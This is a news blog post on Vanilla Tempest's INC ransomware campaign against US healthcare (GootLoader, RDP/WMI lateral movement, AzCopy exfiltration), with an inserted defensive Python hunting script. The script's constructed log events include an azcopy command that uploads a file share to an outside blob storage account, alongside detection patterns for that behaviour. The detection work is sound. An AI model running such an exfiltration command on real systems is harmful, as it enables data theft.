Vanilla Tempest deploys the new INC ransomware strain
Microsoft has identified a new ransomware campaign by Vanilla Tempest.
The attackers exploit GootLoader infections, then move laterally via Remote Desktop Protocol (RDP) and Windows Management Instrumentation (WMI) to deploy the ransomware. These techniques give the attackers deeper control and let them execute the ransomware payload across the network.
Vanilla Tempest has been active since at least 2022. The group is known for leveraging existing ransomware such as BlackCat and Quantum Locker, and now uses Azure tools such as Storage Explorer and AzCopy to exfiltrate data, increasing the complexity of its operations.
Microsoft Threat Intelligence on X:
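For defenders, the two behaviours named above (WMI-driven lateral movement and AzCopy exfiltration) can be hunted in process-creation logs. The following is an added example, not code from Microsoft or the source article; the event field names, host names, storage accounts and the approved-account list are assumptions, and the events are constructed.

```python
import ntpath
import re
import shlex

APPROVED_ACCOUNTS = {"contosobackup"}  # assumption: storage accounts the organisation owns
BLOB_URL = re.compile(r"https://([a-z0-9]{3,24})\.blob\.core\.windows\.net", re.I)

# Constructed process-creation events (Sysmon Event ID 1 style fields); not real telemetry.
EVENTS = [
    {"host": "FS-02", "parent": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "image": r"C:\Windows\System32\cmd.exe", "cmdline": "cmd.exe /c whoami"},
    {"host": "FS-02", "parent": r"C:\Windows\System32\cmd.exe", "image": r"C:\Users\Public\azcopy.exe",
     "cmdline": r'azcopy.exe copy "D:\Shares\Records" '
                r'"https://examplestore01.blob.core.windows.net/c1?sv=PLACEHOLDER" --recursive'},
    {"host": "BK-01", "parent": r"C:\Windows\System32\svchost.exe", "image": r"C:\Tools\azcopy.exe",
     "cmdline": r'azcopy.exe sync "E:\Backups" '
                r'"https://contosobackup.blob.core.windows.net/nightly?sv=PLACEHOLDER"'},
    {"host": "WS-14", "parent": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "image": r"C:\Windows\System32\cmd.exe", "cmdline": "cmd.exe /c ipconfig"},
]

def base(path):
    return ntpath.basename(path).lower()

def classify(event):
    """Return a finding label for one event, or None."""
    if base(event["parent"]) == "wmiprvse.exe" and base(event["image"]) in ("cmd.exe", "powershell.exe"):
        return "WMI_SPAWNED_SHELL"  # WMI-created process; also seen in legitimate admin work
    if base(event["image"]) == "azcopy.exe":
        args = [a.strip('"') for a in shlex.split(event["cmdline"], posix=False)]
        positional = [a for a in args[1:] if not a.startswith("--")]
        # azcopy <verb> <source> <destination>: only a blob URL as destination is an upload.
        if len(positional) >= 3 and positional[0] in {"copy", "cp", "sync"}:
            match = BLOB_URL.match(positional[2])
            if match and match.group(1).lower() not in APPROVED_ACCOUNTS:
                return "AZCOPY_UPLOAD_UNAPPROVED:" + match.group(1).lower()
    return None

def triage(events):
    """Group findings per host; a host showing both finding types is high priority."""
    per_host = {}
    for ev in events:
        if (label := classify(ev)):
            per_host.setdefault(ev["host"], []).append(label)
    return {host: {"findings": labels,
                   "priority": "high" if len({f.split(":")[0] for f in labels}) > 1 else "review"}
            for host, labels in per_host.items()}

if __name__ == "__main__":
    print(triage(EVENTS))
```

A WMI-spawned shell alone is common in legitimate administration, so it is only marked for review; the same host also uploading to a storage account outside the approved list is what raises the priority.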
Microsoft observed the financially motivated threat actor tracked as Vanilla Tempest using INC ransomware for the first time to target the healthcare sector in the United States. pic.twitter.com/WnnZvGODjV
— Microsoft Threat Intelligence (@MsftSecIntel) September 18, 2024
Opinion
It could be that I’m just on the lookout for positive news (likely), but it seems like tech giants are finally taking privacy and cybersecurity more seriously. Google is also stepping up with stronger security measures. Perhaps the massive financial repercussions from recent lawsuits are pushing them to prioritize these issues more aggressively?
Source: https://thehackernews.com/2024/09/microsoft-warns-of-new-inc-ransomware.html
Image by fernando zhiminaicela from Pixabay.